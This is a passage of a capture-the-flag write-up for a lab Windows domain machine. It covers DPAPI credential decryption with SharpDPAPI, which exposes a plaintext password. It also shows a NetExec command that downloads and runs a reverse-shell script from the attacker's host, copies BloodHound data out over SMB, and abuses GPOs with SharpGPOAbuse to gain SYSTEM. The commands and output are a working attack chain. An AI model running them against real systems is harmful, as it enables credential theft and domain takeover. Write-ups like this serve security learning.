[SMB] NTLMv2-SSP Hash     : PPotts::OFFICE:84d7198a8f315f82:619EDA44C25551854133F5E2148AEA31:0101000000000000806082BCA7CFDA010EDED5A63F742F8200000000020008005A004D005600450001001E00570049004E002D00310033004C00520043004E004500460037004100470004003400570049004E002D00310033004C00520043004E00450046003700410047002E005A004D00560045002E004C004F00430041004C00030014005A004D00560045002E004C004F00430041004C00050014005A004D00560045002E004C004F00430041004C0007000800806082BCA7CFDA0106000400020000000800300030000000000000000100000000200000138F1733800C70B653E8DEBC5943F72CF0369267E56FB803BE0BD9F50DF58AD00A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003600000000000000000
```

I captured an encrypted Net-NTLMv2 challenge, but I could not crack it. The user's password is not present in `rockyou.txt`

Instead, the intended approach for this machine is to use a mechanism described in [Operational Guidance for Offensive User DPAPI Abuse](https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107?gi=58988bd77603)

Usually, the masterkey needs to be decrypted using the user’s password or the domain backup key, but they present another approach:

```text
A component of MS-BKRP (the Microsoft BackupKey Remote Protocol) is an RPC server running on domain controllers that handles the decryption of DPAPI keys for authorized users via its domain-wide DPAPI backup key. In other words, if our current user context "owns" a given master key, we can nicely ask a domain controller to decrypt it for us! This is not a "vuln"; it is by design and is meant as a failsafe in case users change/lose their passwords, and to support various smart cards' functionality.
```

We can use [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) to decrypt the masterkeys and retrieve the passwords.  
The one in [SharpCollection](https://github.com/Flangvik/SharpCollection) is not up-to-date.  
To compile, clone the repo, and open the solution. Right-click on the project `SharpDPAPI` in Solution Explorer and select `Properties`. Under `Application`, update `target` to `.NET Framework 4.8`.  
On the toolbar, set the configuration to `Release`. Then, select `SharpDPAPI` in Solution Explorer and use <kbd>Ctrl</kbd> + <kbd>B</kbd> to build.

```console
PS C:\Windows\Tasks> iwr 10.10.14.26:8000/SharpDPAPI.exe -o SharpDPAPI.exe
PS C:\Windows\Tasks> .\SharpDPAPI.exe credentials /rpc

  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.12.0


[*] Action: User DPAPI Credential Triage

[*] Will ask a domain controller to decrypt masterkeys for us

[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d
[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb
[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\2e60efce-b7d4-43aa-9160-5202ca6b8be2

[*] Preferred master keys:

C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107:2e60efce-b7d4-43aa-9160-5202ca6b8be2

[*] User master key cache:

{10811601-0fa9-43c2-97e5-9bef8471fc7d}:FBAB11CACDD8407E8DB9604F0F8C92178BEE6FD3
{191d3f9d-7959-4b4d-a520-a444853c47eb}:85285EB368BEFB1670633B05CE58CA4D75C73C77
{2e60efce-b7d4-43aa-9160-5202ca6b8be2}:DA43CC5F30EDB439B153A67FD18496A50117E95E


[*] Triaging Credentials for current user


Folder       : C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\

  CredFile           : 18A1927A997A794B65E9849883AC3F3E

    guidMasterKey    : {191d3f9d-7959-4b4d-a520-a444853c47eb}
    size             : 358
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Enterprise Credential Data

    LastWritten      : 5/9/2023 2:08:54 PM
    TargetName       : LegacyGeneric:target=MyTarget
    TargetAlias      :
    Comment          :
    UserName         : MyUser
    Credential       :

  CredFile           : 84F1CAEEBF466550F4967858F9353FB4

    guidMasterKey    : {191d3f9d-7959-4b4d-a520-a444853c47eb}
    size             : 398
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Enterprise Credential Data

    LastWritten      : 5/9/2023 4:03:21 PM
    TargetName       : Domain:interactive=OFFICE\HHogan
    TargetAlias      :
    Comment          :
    UserName         : OFFICE\HHogan
    Credential       : H4ppyFtW183#

  CredFile           : E76CCA3670CD9BB98DF79E0A8D176F1E

    guidMasterKey    : {10811601-0fa9-43c2-97e5-9bef8471fc7d}
    size             : 374
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Enterprise Credential Data

    LastWritten      : 1/18/2024 11:53:30 AM
    TargetName       : Domain:interactive=office\hhogan
    TargetAlias      :
    Comment          :
    UserName         : office\hhogan
    Credential       :
```

It automatically finds and decrypts the masterkeys and uses them to decrypt credentials.  
We've acquired another set of credentials:

```text
hhogan:H4ppyFtW183#
```

`hhogan` belongs to the `Remote Management Users` group; `NetExec` can be used to obtain a WinRM shell:

```console
root@6bf4af05914d:~# nxc winrm 10.10.11.3 -d office.htb -u 'hhogan' -p 'H4ppyFtW183#' -X 'IEX(IWR http://10.10.14.26:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.26 9001'
```

## GPO abuse

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name     SID
============= =============================================
office\hhogan S-1-5-21-1199398058-4196589450-691661856-1108


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
OFFICE\GPO Managers                         Group            S-1-5-21-1199398058-4196589450-691661856-1117 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

`hhogan` also belongs to the group `GPO Managers`  
We can use the bloodhound data previously collected by [adPEAS](https://github.com/61106960/adPEAS) to view the privileges held by `GPO Managers`

To transfer the data, start an SMB server:

```console
opcode@debian$ sudo smbserver.py -username opcode -password opcode -smb2support crate `pwd`
```

And add it to the box with:

```console
PS C:\Windows\Tasks> net use \\10.10.14.26\crate opcode /user:opcode
The command completed successfully.
```

Now, we can transfer the file:

```console
PS C:\Windows\Tasks> copy .\office.htb_20240706102805_BloodHound.zip \\10.10.14.26\crate\office.htb_20240706102805_BloodHound.zip
```

Start `neo4j` server and then run bloodhound:

```console
opcode@debian$ ./BloodHound --in-process-gpu
```

After uploading the data, we can look under outbound object controls for `hhogan`:

![5](images/5.png)

The members of group `GPO Managers` have `GenericWrite` over the GPOs: `Default Domain Policy` and `Default Domain Controllers Policy`  
To abuse it, we can use [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse)

```console
PS C:\Windows\Tasks> iwr 10.10.14.26:8000/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
PS C:\Windows\Tasks> .\SharpGPOAbuse.exe --AddComputerTask --TaskName 'Update' --Author 'office\Administrator' --GPOName 'Default Domain Policy' --Command rundll32.exe --Arguments 'C:\Windows\Tasks\opcode.dll,pwn'
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
```

It asks to wait for the GPO update cycle, but the user `hhogan` has the privileges to update it immediately:

```console
PS C:\Windows\Tasks> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.
```

I immediately received a shell as system:

```console
PS C:\Windows\system32> whoami
nt authority\system
```
